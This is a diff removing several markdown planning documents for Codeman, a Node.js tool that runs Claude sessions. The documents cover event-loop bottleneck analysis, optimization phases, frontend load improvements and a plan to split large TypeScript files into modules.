- **File watchers**: One `chokidar` watcher per tracked agent directory, plus transcript file watchers. With many agents, this means many active file watchers consuming kernel inotify resources.
|
||||
|
||||
The `getClaudePids()` call spawns a child process (`pgrep`) every 10 seconds. Under heavy load, child process spawning competes with the event loop.
|
||||
|
||||
### 7. SSE Client Iteration — O(clients) per broadcast
|
||||
**File**: `src/web/server.ts:4964-4966`
|
||||
**Severity**: MEDIUM
|
||||
|
||||
Every `broadcast()` iterates all SSE clients to send the pre-formatted message. With multiple browser tabs or mobile clients, each flush sends data to every client. The `reply.raw.write()` call goes through Node's HTTP stream, which is generally non-blocking but can cause backpressure cascades.
|
||||
|
||||
The backpressure handling (line 4916-4938) correctly skips backpressured clients, but the `once('drain')` handler sends a `session:needsRefresh` event, which the client responds to by fetching the full buffer — potentially a 2MB request — amplifying the problem.
|
||||
|
||||
### 8. Event Emitter Fan-Out in Session
|
||||
**File**: `src/session.ts:1008-1009`
|
||||
**Severity**: MEDIUM
|
||||
|
||||
Every PTY data chunk emits TWO events: `terminal` and `output`. The `terminal` event triggers `batchTerminalData()` in server.ts. The `output` event may trigger additional handlers. EventEmitter dispatch is synchronous — all listeners run before the next operation in the PTY handler continues.
|
||||
|
||||
With busy sessions, this means every chunk blocks the event loop for: PTY processing + all terminal listeners + all output listeners.
|
||||
|
||||
---
|
||||
|
||||
## Medium-Severity Findings
|
||||
|
||||
### 9. Respawn Controller Timer Accumulation
|
||||
**File**: `src/respawn-controller.ts` (various)
|
||||
**Severity**: MEDIUM
|
||||
|
||||
Each session with respawn enabled runs multiple timers:
|
||||
- Idle detection timeout
|
||||
- AI checker interval (when active)
|
||||
- Output silence detection interval
|
||||
- Token stability interval
|
||||
- Circuit breaker state timeouts
|
||||
|
||||
With 10 sessions with respawn, that's 50+ active timers. While individual timers are cheap, the cumulative effect on the event loop's timer queue is non-trivial — the libuv timer heap has O(log n) insertion but all callbacks run synchronously.
|
||||
|
||||
### 10. Team Watcher Polling
|
||||
**File**: `src/team-watcher.ts`
|
||||
**Severity**: MEDIUM (when agent teams are active)
|
||||
|
||||
Polls `~/.claude/teams/` directory every few seconds. Each poll reads config.json files and task files. With active teams, this adds filesystem reads to the event loop's I/O budget.
|
||||
|
||||
### 11. Frontend Terminal Write Batching
|
||||
**File**: `src/web/public/app.js` (batchTerminalWrite/flushPendingWrites)
|
||||
**Severity**: MEDIUM
|
||||
|
||||
The frontend batches terminal writes at `requestAnimationFrame` rate (16ms). When receiving SSE events from multiple busy sessions:
|
||||
- `batchTerminalWrite()` is called for EVERY session's data, even sessions not currently displayed
|
||||
- Terminal instances exist for all sessions (not just the active tab)
|
||||
- Each `flushPendingWrites()` calls `terminal.write()` which triggers xterm.js rendering
|
||||
|
||||
Hidden tabs still process terminal writes, consuming CPU for rendering that's never displayed.
|
||||
|
||||
### 12. Frontend Connection Line Rendering
|
||||
**File**: `src/web/public/app.js` (updateConnectionLines)
|
||||
**Severity**: LOW-MEDIUM
|
||||
|
||||
Connection lines between parent/child agent windows are recalculated on window moves, resizes, and potentially on terminal writes. With many subagent windows open, this involves DOM reads (getBoundingClientRect) that force layout recalculation.
|
||||
|
||||
### 13. Image Watcher File System Events
|
||||
**File**: `src/image-watcher.ts`
|
||||
**Severity**: LOW
|
||||
|
||||
Uses chokidar to watch for image files in session working directories. With many sessions in the same or overlapping directories, watchers may generate redundant events. The `awaitWriteFinish` and burst throttling mitigate this, but the kernel inotify resources add up.
|
||||
|
||||
### 14. ANSI Escape Regex Complexity
|
||||
**File**: `src/session.ts:999`
|
||||
**Severity**: LOW (but cumulative)
|
||||
|
||||
`ANSI_ESCAPE_PATTERN_FULL` is a complex regex with multiple alternation branches. While V8's regex engine handles this well for typical terminal data, adversarial input (deeply nested escape sequences) could cause superlinear matching time. The `FOCUS_ESCAPE_FILTER` regex runs first on every chunk.
|
||||
|
||||
---
|
||||
|
||||
## Scaling Analysis
|
||||
|
||||
| Resource | Per Session | 10 Sessions | 20 Sessions |
|
||||
|----------|-------------|-------------|-------------|
|
||||
| PTY data handlers | 1 synchronous chain | 10 chains competing for event loop | 20 chains — event loop saturation likely |
|
||||
| Broadcast calls (terminal only) | 20-60/sec | 200-600/sec | 400-1200/sec |
|
||||
| JSON.stringify (terminal) | 20-60/sec | 200-600/sec | 400-1200/sec |
|
||||
| Active timers | ~5 | ~50 | ~100 |
|
||||
| File watchers (subagents) | 2-5 | 20-50 | 40-100 |
|
||||
| SSE writes per flush | N clients | N clients x 10 sessions | N clients x 20 sessions |
|
||||
| Ralph line processing | O(lines/sec) | O(10 x lines/sec) | O(20 x lines/sec) |
|
||||
|
||||
**The critical threshold appears to be 5-8 simultaneously busy sessions**, where the cumulative PTY processing + broadcast serialization + timer callbacks start to exceed the event loop's capacity for responsive handling.
|
||||
|
||||
---
|
||||
|
||||
## Root Cause Architecture Diagram
|
||||
|
||||
```
|
||||
Busy Claude Session 1 ─┐
|
||||
Busy Claude Session 2 ─┤ ┌──────────────────────┐
|
||||
Busy Claude Session 3 ─┼───→│ Node.js Event Loop │
|
||||
Busy Claude Session 4 ─┤ │ (SINGLE THREAD) │
|
||||
Busy Claude Session 5 ─┘ │ │
|
||||
│ PTY handlers (sync) │◄── BOTTLENECK 1
|
||||
│ ANSI strip regex │
|
||||
│ Ralph tracker │
|
||||
│ Bash tool parser │
|
||||
│ Idle detection │
|
||||
│ │ │
|
||||
│ ▼ │
|
||||
│ EventEmitter.emit() │◄── BOTTLENECK 2
|
||||
│ │ │
|
||||
│ ▼ │
|
||||
│ batchTerminalData() │
|
||||
│ (shared timer) │◄── BOTTLENECK 3
|
||||
│ │ │
|
||||
│ ▼ │
|
||||
│ flushTerminalBatches() │
|
||||
│ broadcast() per session│
|
||||
│ JSON.stringify() each │◄── BOTTLENECK 4
|
||||
│ write() to N clients │
|
||||
│ │
|
||||
│ + persistSessionState │◄── BOTTLENECK 5
|
||||
│ + respawn timers │
|
||||
│ + subagent polling │
|
||||
│ + team watcher │
|
||||
└────────────────────────┘
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Recommendations (Not Implemented — For Discussion)
|
||||
|
||||
### Tier 1: Highest Impact, Lowest Risk
|
||||
1. **Disable processing for non-visible sessions**: Skip Ralph tracking, bash tool parsing, and task description parsing for sessions that no active SSE client is viewing. Only buffer terminal data.
|
||||
2. **Per-session flush staggering**: Instead of one shared timer flushing all sessions, use individual timers offset by `index * (interval/N)` to spread flushes across the batch window.
|
||||
3. **Skip hidden tab terminal writes on frontend**: Don't call `terminal.write()` for terminals not in the active tab. Lazy-load on tab switch.
|
||||
|
||||
### Tier 2: Medium Impact
|
||||
4. **Worker thread for ANSI stripping and parsing**: Move the regex-heavy ANSI strip + Ralph parsing to a worker thread pool. PTY data → worker → clean data back to main thread.
|
||||
5. **Pre-formatted SSE messages for terminal data**: Since terminal events are just `{id, data}`, build the SSE message string directly without `JSON.stringify`.
|
||||
6. **Adaptive processing based on load**: When event loop lag exceeds a threshold (measured via `setTimeout(0)` drift), reduce processing — skip Ralph, increase batch intervals, reduce subagent poll frequency.
|
||||
|
||||
### Tier 3: Longer-Term Architectural
|
||||
7. **Process-per-session or cluster mode**: Move each session's PTY handling to a separate Node.js worker or process, communicating to the main server via IPC.
|
||||
8. **Binary protocol for terminal data**: Replace JSON-encoded SSE terminal events with binary frames (e.g., MessagePack or raw binary WebSocket frames) to eliminate double-encoding.
|
||||
9. **Selective SSE subscriptions**: Clients subscribe to specific sessions instead of receiving all events. The server only broadcasts to interested clients.
|
||||
|
||||
---
|
||||
|
||||
## How to Validate
|
||||
|
||||
To confirm these findings, instrument with:
|
||||
```typescript
|
||||
// Add to event loop — measures how long synchronous work takes
|
||||
let lastCheck = Date.now();
|
||||
setInterval(() => {
|
||||
const now = Date.now();
|
||||
const lag = now - lastCheck - 100; // 100ms interval
|
||||
if (lag > 10) console.log(`[PERF] Event loop lag: ${lag}ms`);
|
||||
lastCheck = now;
|
||||
}, 100);
|
||||
```
|
||||
|
||||
And in `flushTerminalBatches()`:
|
||||
```typescript
|
||||
const start = performance.now();
|
||||
// ... existing flush logic ...
|
||||
const elapsed = performance.now() - start;
|
||||
if (elapsed > 5) console.log(`[PERF] Flush took ${elapsed.toFixed(1)}ms for ${this.terminalBatches.size} sessions`);
|
||||
```
|
||||
|
||||
This will show exactly when and how much the event loop is being blocked during heavy session activity.
|
||||
@@ -1,168 +0,0 @@
|
||||
# Performance & Responsiveness Optimization Plan
|
||||
|
||||
**Date**: 2026-02-28
|
||||
**Status**: Phases 1–4 Complete. Phase 5 optional/deferred.
|
||||
|
||||
---
|
||||
|
||||
## Executive Summary
|
||||
|
||||
Three independent research passes analyzed the Codeman codebase for performance bottlenecks across frontend rendering, backend hot paths, and system-level resource usage. The codebase already has strong foundational optimizations (per-session adaptive batching, rAF terminal writes, DEC 2026 sync markers, backpressure handling). This plan targets the remaining high-impact opportunities.
|
||||
|
||||
**Key finding**: The biggest wins come from **skipping unnecessary work** — serializing unchanged state, processing output nobody is watching, and reducing broadcast volume.
|
||||
|
||||
---
|
||||
|
||||
## Phase 1: Quick Wins — COMPLETE
|
||||
|
||||
All Phase 1 items were found to already exist in the codebase during verification:
|
||||
|
||||
| # | Item | Status | Evidence |
|
||||
|---|------|--------|----------|
|
||||
| 1.1 | Skip terminal writes for hidden tabs | Done | SSE handler filters by `activeSessionId` (app.js:4076) |
|
||||
| 1.2 | mobile.css media query | Done | `media="(max-width: 1023px)"` on link tag (index.html:13) |
|
||||
| 1.3 | Deduplicate init API calls | Done | `_initGeneration` dedup + 3s fallback timer (app.js:2901-2904) |
|
||||
| 1.4 | Remove cache-busting timestamps | Done | No `?_t=` patterns found anywhere |
|
||||
| 1.5 | JS/CSS minification + compression | Done | esbuild minify + gzip + brotli in build.mjs (lines 42-51) |
|
||||
|
||||
---
|
||||
|
||||
## Phase 2: Frontend Responsiveness — COMPLETE
|
||||
|
||||
### 2.1 Batch `getBoundingClientRect()` in connection lines — DONE
|
||||
- **Files**: `src/web/public/app.js` (`_updateConnectionLinesImmediate()`)
|
||||
- **Change**: Refactored to batch all layout reads into Phase 1 (collect all rects into a Map), then perform all SVG writes in Phase 2 using cached values. Classic read-then-write pattern prevents interleaved forced reflows.
|
||||
|
||||
### 2.2 Clean up ResizeObservers — Already implemented
|
||||
- `forceCloseSubagentWindow()` disconnects observers (app.js:12618-12620)
|
||||
- `cleanupAllFloatingWindows()` disconnects all on reconnect (app.js:12649-12653)
|
||||
- Observer refs stored on `windowData.resizeObserver` (app.js:12492)
|
||||
|
||||
### 2.3 Drag handler cleanup — Already implemented
|
||||
- `makeWindowDraggable()` returns listener refs, stored in `windowData.dragListeners`
|
||||
- `forceCloseSubagentWindow()` removes all document-level drag listeners (app.js:12622-12630)
|
||||
- Panel drags add listeners on mousedown, remove on mouseup (app.js:10253-10284)
|
||||
|
||||
### 2.4 Mobile window position cache — Skipped
|
||||
- O(n) loop over max ~20 windows; complexity of cached counter not justified
|
||||
|
||||
### 2.5 Lazy modal DOM — Skipped
|
||||
- Large effort, marginal benefit for a vanilla JS app with fast DOM construction
|
||||
|
||||
---
|
||||
|
||||
## Phase 3: Backend Hot Paths — COMPLETE
|
||||
|
||||
### 3.1 State diff broadcasts — ALREADY OPTIMIZED
|
||||
- `broadcastSessionStateDebounced()` already batches at 500ms intervals
|
||||
- `toLightDetailedState()` excludes heavy buffers (textOutput, terminalBuffer)
|
||||
- Per-session serialization is <1ms; with debouncing, only 1-3 sessions serialize per flush
|
||||
- JSON.stringify happens once per broadcast (not per client) — serialization cost is negligible
|
||||
- Full state diffs would add significant frontend complexity for marginal gain
|
||||
|
||||
### 3.2 Improve session list cache hit rate — DONE
|
||||
- **Files**: `src/web/server.ts` (`broadcast()` method)
|
||||
- **Change**: Cache now only invalidated on truly structural events (`session:created`, `session:deleted`, `session:updated`) instead of on every `session:*` and `respawn:*` event. High-frequency events like `session:working`, `session:idle`, `session:completion`, `respawn:stateChanged` no longer defeat the 1s TTL cache.
|
||||
- **Impact**: Cache hit ratio from ~0% to ~80%+ during active sessions. The debounced `session:updated` still refreshes the cache within 500ms of any state change.
|
||||
|
||||
### 3.3 Skip PTY processing — ALREADY OPTIMIZED
|
||||
- `_processExpensiveParsers()` is already throttled to every 150ms (not per-chunk)
|
||||
- Lazy ANSI stripping via `getCleanData()` closure — only computed when a consumer needs it
|
||||
- Quick pre-checks skip parsers when content is irrelevant (e.g., token parser only runs if data contains "token")
|
||||
- OpenCode sessions skip all Claude-specific parsers entirely
|
||||
- Further optimization would require visibility-aware processing, adding complexity for marginal gain
|
||||
|
||||
### 3.4 Batch subagent liveness checks — Deferred
|
||||
- `/proc/{pid}` stat calls are ~0.1ms each; even with 500 agents, total is 50ms every 10s
|
||||
- Current approach is simple and reliable; batching adds race condition risk
|
||||
- Consider only if profiling shows this as a bottleneck
|
||||
|
||||
### 3.5 Deduplicate detection update emissions — DONE
|
||||
- **Files**: `src/respawn-controller.ts` (`startDetectionUpdates()`)
|
||||
- **Change**: Detection status now only emitted when key fields (confidenceLevel, statusText, controller state) actually change. Previously emitted every 2s regardless, broadcasting identical status to all SSE clients.
|
||||
- **Impact**: For stable/idle sessions, eliminates ~100% of redundant detection broadcasts. For active sessions, reduces broadcasts to only meaningful state transitions.
|
||||
|
||||
---
|
||||
|
||||
## Phase 4: System-Level Improvements — COMPLETE
|
||||
|
||||
### 4.1 Incremental state persistence — DONE
|
||||
- **Files**: `src/state-store.ts` (`assembleStateJson()`, `setSession()`)
|
||||
- **Change**: Added `dirtySessions` Set and `cachedSessionJsons` Map. On persist, only dirty sessions are re-serialized; clean sessions reuse cached JSON fragments. `setSession()` marks sessions dirty; `assembleStateJson()` rebuilds only changed fragments.
|
||||
- **Impact**: Serialization cost reduced from O(all sessions) to O(dirty sessions). Typical steady-state: 1-2 dirty sessions instead of 50.
|
||||
|
||||
### 4.2 Replace polling with fs watchers for team watcher — DONE
|
||||
- **Files**: `src/team-watcher.ts` (`setupFsWatchers()`)
|
||||
- **Change**: Added chokidar watchers on both `~/.claude/teams/` and `~/.claude/tasks/` directories for instant event-driven detection. Lock files ignored via chokidar config. Mtime-based dedup skips unchanged files. Polling interval relaxed from 5s to 30s as a fallback.
|
||||
- **Impact**: Near-instant team detection; polling overhead eliminated for normal operation.
|
||||
|
||||
### 4.3 Consolidate subagent file watchers — DONE
|
||||
- **Files**: `src/subagent-watcher.ts` (`setupDirectoryWatcher()`)
|
||||
- **Change**: Replaced per-agent chokidar watchers with one `fs.watch()` per session subagent directory. Events are routed to the correct agent via filename. Per-file debouncing (100ms) prevents hammering on bulk discovery.
|
||||
- **Impact**: Inotify watchers reduced from potentially 500 (one per agent) to ~50 (one per session directory).
|
||||
|
||||
### 4.4 Stream transcript files instead of full reads — DONE
|
||||
- **Files**: `src/subagent-watcher.ts` (`tailFile()`, `findDescriptionInAgentFile()`, parent transcript lookup)
|
||||
- **Change**: Multiple streaming strategies implemented:
|
||||
- **Live monitoring**: Position-based `tailFile()` with `createReadStream({ start: fromPosition })` — only reads new content
|
||||
- **Parent transcript lookup**: Streams only last 16KB (`createReadStream({ start: offset })`)
|
||||
- **Description extraction**: Streams only first 8KB, exits early after 5 lines
|
||||
- **Full read**: Only for on-demand transcript review panel (with optional `limit` parameter)
|
||||
- **Impact**: File I/O for bulk agent discovery reduced from ~50MB to ~5MB.
|
||||
|
||||
---
|
||||
|
||||
## Phase 5: Long-Term Architectural (Optional) — NOT STARTED
|
||||
|
||||
These items are deferred until scaling demands justify the complexity.
|
||||
|
||||
### 5.1 Worker thread for PTY processing
|
||||
- **Files**: `src/session.ts`
|
||||
- **Problem**: ANSI stripping, Ralph tracking, and bash tool parsing all run on the main event loop. At scale (50 busy sessions), this consumes 300-500ms CPU/sec.
|
||||
- **Fix**: Offload ANSI strip + line processing to a worker thread pool. Main thread receives clean text + parsed events.
|
||||
- **Impact**: Frees event loop for I/O operations. Most impactful at 10+ concurrent busy sessions.
|
||||
|
||||
### 5.2 Per-session SSE subscriptions
|
||||
- **Files**: `src/web/server.ts`
|
||||
- **Problem**: Every SSE event is broadcast to all connected clients. A client watching session A still receives events for sessions B through Z.
|
||||
- **Fix**: Clients subscribe to specific session IDs. Server only sends events to interested clients.
|
||||
- **Impact**: Reduces SSE broadcast fan-out from N clients to ~1-2 per event. Major improvement at 100 SSE clients.
|
||||
|
||||
### 5.3 O(1) LRUMap via doubly-linked list
|
||||
- **Files**: `src/utils/lru-map.ts` (~lines 98-110)
|
||||
- **Problem**: `get()` uses delete + re-insert to refresh position — O(n) on Map iteration for delete.
|
||||
- **Fix**: Implement classic LRU with doubly-linked list + Map for O(1) get/put/evict.
|
||||
- **Impact**: Low — current sizes (max 500) make this barely measurable. Only worthwhile if LRUMap is used on hot paths.
|
||||
|
||||
---
|
||||
|
||||
## Completion Summary
|
||||
|
||||
| Phase | Scope | Status | Items |
|
||||
|-------|-------|--------|-------|
|
||||
| 1 | Quick Wins | **Complete** | 5/5 (all pre-existing) |
|
||||
| 2 | Frontend Responsiveness | **Complete** | 3/3 actionable done, 2 skipped |
|
||||
| 3 | Backend Hot Paths | **Complete** | 4/4 actionable done, 1 deferred |
|
||||
| 4 | System-Level | **Complete** | 4/4 done |
|
||||
| 5 | Long-Term Architectural | **Not started** | 0/3 — deferred until needed |
|
||||
|
||||
**Overall**: 16/16 actionable items complete. 3 optional items deferred.
|
||||
|
||||
---
|
||||
|
||||
## Measurement
|
||||
|
||||
Before starting Phase 5, establish baselines:
|
||||
|
||||
1. **Frontend**: Record Chrome DevTools Performance trace with 10 sessions open. Measure:
|
||||
- Frame rate during rapid terminal output
|
||||
- Long tasks (>50ms) count per 30s
|
||||
- Heap size after 1h session
|
||||
|
||||
2. **Backend**: Add `performance.now()` instrumentation around:
|
||||
- `flushSessionTerminalBatch()` — time per flush
|
||||
- `broadcastSessionStateDebounced()` — serialization time
|
||||
- `StateStore.save()` — persist time
|
||||
- Event loop lag via `monitorEventLoopDelay()`
|
||||
|
||||
3. **First load**: Lighthouse score on desktop and mobile (simulated 3G)
|
||||
@@ -1,74 +0,0 @@
|
||||
# Codeman Performance Optimization Plan
|
||||
|
||||
## Current State
|
||||
|
||||
The backend is **already production-grade** — SSE broadcasting, state persistence, terminal batching, buffer management, and memory patterns are all well-optimized. The biggest gains are on the **frontend delivery** side.
|
||||
|
||||
## Implemented Optimizations
|
||||
|
||||
### 1. V8 Compile Cache (10-20% faster cold start)
|
||||
|
||||
**Files:** `scripts/codeman-web.service`, `package.json`
|
||||
|
||||
Node.js re-parses and compiles all JS on every cold start. `NODE_COMPILE_CACHE` caches V8 compiled bytecode to disk, reusing it on subsequent starts.
|
||||
|
||||
- Added `Environment=NODE_COMPILE_CACHE=/home/arkon/.codeman/compile-cache` to systemd service
|
||||
- Added to `npm start` script for non-systemd usage
|
||||
- Zero code changes, immediate win on every restart
|
||||
|
||||
### 2. WebGL Addon Lazy-Loading (244KB saved on mobile, non-blocking on desktop)
|
||||
|
||||
**Files:** `src/web/public/index.html`, `src/web/public/app.js`
|
||||
|
||||
`xterm-addon-webgl.min.js` (244KB) was loaded eagerly for all users via `<script defer>`, but only used on desktop with WebGL2 support.
|
||||
|
||||
- Removed `<script defer>` from `index.html`
|
||||
- Added dynamic script loading in `app.js` — only downloads on desktop when WebGL is needed
|
||||
- Mobile users never download the file at all (244KB saved)
|
||||
- Desktop: loads in parallel with page rendering, addon initializes when ready
|
||||
- Graceful fallback: canvas renderer used if WebGL unavailable or script fails
|
||||
|
||||
### 3. Preload Hints (~50-100ms faster perceived load)
|
||||
|
||||
**Files:** `src/web/public/index.html`
|
||||
|
||||
Browser discovers `<script defer>` tags only when the parser reaches them at the bottom of `<body>`. By then, the HTML parse has blocked for hundreds of lines.
|
||||
|
||||
- Added `<link rel="preload" as="script">` in `<head>` for `vendor/xterm.min.js`, `constants.js`, `app.js`
|
||||
- Browser starts fetching critical scripts immediately during HTML parse (before reaching `<body>`)
|
||||
- Zero runtime overhead — just hints for the browser's preload scanner
|
||||
|
||||
### 4. Batch Tmux Reconciliation (N subprocess calls → 1)
|
||||
|
||||
**Files:** `src/tmux-manager.ts`
|
||||
|
||||
`reconcileSessions()` previously called `tmux has-session` + `tmux display-message` per known session, plus `tmux list-sessions` for discovery, plus `tmux display-message` per discovered session. With 20 sessions: 41+ subprocess calls.
|
||||
|
||||
- Replaced with single `tmux list-panes -a -F '#{session_name}\t#{pane_pid}'` call
|
||||
- Builds a Map from the result, then does O(1) lookups for both known and discovered sessions
|
||||
- Also replaced inner O(n) `isKnown` scan with a Set lookup
|
||||
- 20 sessions: 41 subprocess calls → 1, with faster lookups
|
||||
|
||||
### 5. Asset Hashing / Cache Busting (already implemented)
|
||||
|
||||
**Files:** `scripts/build.mjs` (pre-existing)
|
||||
|
||||
Content-hash cache busting was already implemented in the build script:
|
||||
- All app JS/CSS files get content hashes (`app.abc123.js`)
|
||||
- `index.html` rewritten to reference hashed filenames
|
||||
- Pre-compressed with gzip + Brotli
|
||||
- 1-year immutable cache works correctly — new deploys get new filenames
|
||||
|
||||
## Already Optimized (No Action Needed)
|
||||
|
||||
| Area | Why It's Fine |
|
||||
|------|---------------|
|
||||
| **SSE Broadcasting** | Single serialization per broadcast, preformatted frames, backpressure handling, session subscription filtering |
|
||||
| **State Persistence** | 500ms debounce, incremental per-session JSON caching, async atomic writes, circuit breaker on failures |
|
||||
| **Terminal Batching** | Adaptive intervals (16-50ms), per-session queues, immediate flush at 32KB, array-based accumulation |
|
||||
| **Buffer Management** | BufferAccumulator (array-push, lazy join), auto-trim at 2MB/1MB, no string concatenation in hot paths |
|
||||
| **ANSI Stripping** | Pre-compiled regex via factory functions, single-pass processing |
|
||||
| **Static File Serving** | @fastify/static with 1-year cache, pre-compressed Brotli/gzip, no-cache for HTML |
|
||||
| **Memory Management** | CleanupManager, LRUMap, StaleExpirationMap, bounded buffers, explicit listener cleanup |
|
||||
| **Import Patterns** | Pure ESM, lazy web server import, no circular deps, no dynamic imports in hot paths |
|
||||
| **Config Loading** | Small constant files, no I/O at import time, specific imports (no barrel) |
|
||||
@@ -1,788 +0,0 @@
|
||||
# Phase 4: Domain File Splitting — Implementation Plan
|
||||
|
||||
**Date**: 2026-03-01
|
||||
**Prerequisites**: Phase 1-3 complete (utils cleanup, CleanupManager/Debouncer migration, route extraction)
|
||||
**Goal**: Split 4 god files into focused modules with barrel exports for transparent migration.
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
|
||||
1. [Split types.ts into types/ directory](#1-split-typests-into-types-directory)
|
||||
2. [Split ralph-tracker.ts into focused modules](#2-split-ralph-trackerts-into-focused-modules)
|
||||
3. [Split respawn-controller.ts into focused modules](#3-split-respawn-controllerts-into-focused-modules)
|
||||
4. [Split session.ts into focused modules](#4-split-sessionts-into-focused-modules)
|
||||
5. [Execution Order & Dependencies](#5-execution-order--dependencies)
|
||||
6. [Validation Checklist](#6-validation-checklist)
|
||||
|
||||
---
|
||||
|
||||
## 1. Split types.ts into types/ directory
|
||||
|
||||
**Current**: 1,443 lines, 71 exports, imported by 36 files.
|
||||
**Risk**: LOW — pure type refactor, no runtime behavior change.
|
||||
|
||||
### Target Structure
|
||||
|
||||
```
|
||||
src/types/
|
||||
├── index.ts (barrel re-export — transparent migration)
|
||||
├── common.ts (Disposable, BufferConfig, CleanupResourceType, CleanupRegistration)
|
||||
├── session.ts (SessionStatus, SessionMode, ClaudeMode, SessionConfig, SessionColor,
|
||||
│ SessionState, OpenCodeConfig, SessionOutput)
|
||||
├── task.ts (TaskStatus, TaskDefinition, TaskState)
|
||||
├── app-state.ts (AppState, AppConfig, GlobalStats, TokenUsageEntry, TokenStats,
|
||||
│ DEFAULT_CONFIG, createInitialState, createInitialGlobalStats)
|
||||
├── respawn.ts (RespawnConfig, PersistedRespawnConfig, CycleOutcome,
|
||||
│ RespawnCycleMetrics, RespawnAggregateMetrics, HealthStatus,
|
||||
│ RalphLoopHealthScore, TimingHistory, RespawnPreset)
|
||||
├── ralph.ts (RalphLoopStatus, RalphLoopState, RalphTodoStatus, RalphTodoPriority,
|
||||
│ RalphTodoItem, RalphTodoProgress, RalphSessionState,
|
||||
│ RalphStatusValue, RalphTestsStatus, RalphWorkType, RalphStatusBlock,
|
||||
│ CompletionConfidence, RalphTrackerState,
|
||||
│ CircuitBreakerState, CircuitBreakerReason, CircuitBreakerStatus,
|
||||
│ createInitialCircuitBreakerStatus, createInitialRalphTrackerState,
|
||||
│ createInitialRalphSessionState)
|
||||
├── api.ts (ApiErrorCode, ApiResponse, HookEventType, QuickStartResponse,
|
||||
│ CaseInfo, createErrorResponse, isError, getErrorMessage)
|
||||
├── lifecycle.ts (LifecycleEventType, LifecycleEntry)
|
||||
├── run-summary.ts (RunSummaryEventType, RunSummaryEventSeverity, RunSummaryEvent,
|
||||
│ RunSummaryStats, RunSummary, createInitialRunSummaryStats)
|
||||
├── tools.ts (ActiveBashToolStatus, ActiveBashTool, ImageDetectedEvent)
|
||||
├── teams.ts (TeamConfig, TeamMember, TeamTask, InboxMessage, PaneInfo)
|
||||
├── push.ts (PushSubscriptionRecord, VapidKeys)
|
||||
└── plan.ts (PlanTaskStatus, TddPhase, PlanItem re-export, NiceConfig,
|
||||
DEFAULT_NICE_CONFIG, ProcessStats)
|
||||
```
|
||||
|
||||
### Steps
|
||||
|
||||
1. **Create `src/types/` directory** and each domain file above.
|
||||
|
||||
2. **Move types** from `src/types.ts` into their domain files. Preserve all JSDoc comments. Each file should import from siblings as needed (e.g., `ralph.ts` imports `CircuitBreakerState` within itself — no cross-file deps needed since they're in the same file).
|
||||
|
||||
3. **Create barrel `src/types/index.ts`** that re-exports everything:
|
||||
```typescript
|
||||
export * from './common.js';
|
||||
export * from './session.js';
|
||||
export * from './task.js';
|
||||
export * from './app-state.js';
|
||||
export * from './respawn.js';
|
||||
export * from './ralph.js';
|
||||
export * from './api.js';
|
||||
export * from './lifecycle.js';
|
||||
export * from './run-summary.js';
|
||||
export * from './tools.js';
|
||||
export * from './teams.js';
|
||||
export * from './push.js';
|
||||
export * from './plan.js';
|
||||
```
|
||||
|
||||
4. **Delete old `src/types.ts`** and replace with a single-line re-export barrel:
|
||||
```typescript
|
||||
export * from './types/index.js';
|
||||
```
|
||||
This ensures `import { ... } from './types.js'` continues to work everywhere — zero changes to 36 import sites.
|
||||
|
||||
5. **Verify**: `tsc --noEmit` and `npm run lint` must pass. No runtime changes.
|
||||
|
||||
### Internal Dependencies Between Domain Files
|
||||
|
||||
Some types reference others across domains. Handle with imports:
|
||||
|
||||
| File | Imports From |
|
||||
|------|-------------|
|
||||
| `app-state.ts` | `session.ts` (SessionState), `task.ts` (TaskState), `ralph.ts` (RalphLoopState, RalphSessionState) |
|
||||
| `respawn.ts` | None (self-contained) |
|
||||
| `ralph.ts` | None (self-contained) |
|
||||
| `run-summary.ts` | None (self-contained) |
|
||||
| `api.ts` | None (self-contained) |
|
||||
| `session.ts` | `respawn.ts` (RespawnConfig), `ralph.ts` (RalphTrackerState, RalphTodoItem, CircuitBreakerStatus, RalphSessionState, RunSummaryEvent) |
|
||||
|
||||
Wait — `SessionState` references `RespawnConfig`, `RalphTrackerState`, `CircuitBreakerStatus`, and `RunSummaryEvent`. This creates imports from `session.ts` → `respawn.ts`, `ralph.ts`, `run-summary.ts`. This is fine (one-way deps, no cycles).
|
||||
|
||||
---
|
||||
|
||||
## 2. Split ralph-tracker.ts into focused modules
|
||||
|
||||
**Current**: 3,868 lines, single `RalphTracker` class with 5 responsibilities.
|
||||
**Risk**: MEDIUM — class has shared mutable state, but extractable modules are well-isolated.
|
||||
|
||||
### Coupling Analysis Summary
|
||||
|
||||
| Module | Coupling | Extractability |
|
||||
|--------|----------|----------------|
|
||||
| Plan task tracking | LOW | HIGH — only reads `cycleCount` |
|
||||
| Fix-plan file watching | LOW | HIGH — callback-based todo replacement |
|
||||
| Iteration stall detection | LOW | HIGH — notification-based |
|
||||
| RALPH_STATUS block parsing + circuit breaker | MEDIUM | MEDIUM — callback for circuit breaker updates |
|
||||
| Todo parsing, loop detection, completion | HIGH | LOW — deeply entangled shared state |
|
||||
|
||||
### Target Structure
|
||||
|
||||
```
|
||||
src/
|
||||
├── ralph-tracker.ts (~1,800 LOC — core: output parsing, loop state,
|
||||
│ todo management, completion detection)
|
||||
├── ralph-plan-tracker.ts (~600 LOC — plan tasks, checkpoints, history, rollback)
|
||||
├── ralph-status-parser.ts (~300 LOC — RALPH_STATUS block parsing, circuit breaker)
|
||||
├── ralph-fix-plan-watcher.ts (~150 LOC — @fix_plan.md file watching)
|
||||
└── ralph-stall-detector.ts (~80 LOC — iteration stall detection)
|
||||
```
|
||||
|
||||
### Step 2a: Extract `RalphPlanTracker` (~600 LOC)
|
||||
|
||||
**Why first**: Lowest coupling. Only dependency is `cycleCount` for checkpoint detection.
|
||||
|
||||
**Extract these from `RalphTracker`**:
|
||||
|
||||
Types to export:
|
||||
- `EnhancedPlanTask` (interface, currently lines 56-87)
|
||||
- `CheckpointReview` (interface, currently lines 90-139)
|
||||
|
||||
Properties to move:
|
||||
- `_planVersion: number`
|
||||
- `_planHistory: Array<{version, timestamp, tasks, summary}>`
|
||||
- `_planTasks: Map<string, EnhancedPlanTask>`
|
||||
- `_checkpointIterations: number[]`
|
||||
- `_lastCheckpointIteration: number`
|
||||
|
||||
Methods to move:
|
||||
- `initializePlanTasks(items)`
|
||||
- `updatePlanTask(taskId, update)`
|
||||
- `addPlanTask(params)`
|
||||
- `getPlanTasks()`
|
||||
- `generateCheckpointReview()`
|
||||
- `getPlanHistory()`
|
||||
- `rollbackToVersion(version)`
|
||||
- `isCheckpointDue()`
|
||||
- `planVersion` getter
|
